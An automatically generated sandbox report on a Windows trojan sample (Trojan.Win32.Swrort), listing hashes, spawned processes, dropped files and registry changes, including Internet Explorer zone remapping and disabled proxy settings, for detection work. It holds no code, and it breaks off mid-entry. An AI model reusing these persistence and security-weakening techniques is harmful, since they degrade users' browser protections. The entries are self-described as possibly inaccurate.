Trojan.Win32.Swrort.3_eb4a1216ea

by malwarelabrobot on December 11th, 2015 in Malware Descriptions.

Adware.Agent.QCF (B) (Emsisoft), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.

MD5: eb4a1216ea797f8bde4485f7b0580c8e
SHA1: 6a713ff3bdcdc151795c1e78fc49b0e6f5e0bcf9
SHA256: 007c79d7b1b904520a21d541ddccddb90fe37d2eef4a767512b3273372f98ad8
SSDeep: 49152:bbW/0oVqkt1lJcWbZdlIeKt3mFz6zBEd6uIcc:bbW/tEWFLolEd6uxc
Size: 2165862 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-10 18:00:27
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

msconfig.exe:656
%original file name%.exe:228
irsetup.exe:188
irsetup.exe:1668
chromeupdate.exe:1820

The Trojan injects its code into the following process(es):

MediaPlayer__15159_il35679.exe:1884

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process MediaPlayer__15159_il35679.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)

The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

The process irsetup.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

The process irsetup.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
%Program Files%\Your Product\lua5.1.dll (2902 bytes)
%Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe (12280 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
%Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\uninstall.exe (9213 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
%Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (0 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)

The process chromeupdate.exe:1820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

Registry activity

The process msconfig.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 27 9F F6 F6 93 CA 7A D9 D9 71 4D D7 FB 8A 67"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

The process MediaPlayer__15159_il35679.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\cousins.epoxied.1]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\cousins.epoxied.1\CLSID]
"(Default)" = "{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\VersionIndependentProgID]
"(Default)" = "cousins.epoxied"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCR\cousins.epoxied]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\TypeLib]
"(Default)" = "{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\cousins.epoxied\CurVer]
"(Default)" = "cousins.epoxied.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level" = ""

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}]
"(Default)" = "IBoot"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1449692446"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A EE 8F 0A 84 D8 F6 46 51 DB B6 5D E1 92 43 BF"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"(Default)" = "{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MediaPlayer__15159_il35679.exe"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\ProgID]
"(Default)" = "cousins.epoxied.1"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0]
"(Default)" = "InstallerLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}]
"(Default)" = "Inst Class"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security zone settings to map all local web nodes with no dots in their name that are not already mapped to a zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 24 A9 41 8C B4 D6 53 9D DA A4 48 EF A1 7A CC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security zone settings to map all local web nodes with no dots in their name that are not already mapped to a zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process irsetup.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 61 5A FB E4 3A A8 3F 65 D9 1D 76 7D 33 AD 77"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security zone settings to map all local web nodes with no dots in their name that are not already mapped to a zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process irsetup.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"HelpLink" = "http://www.yourcompany.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
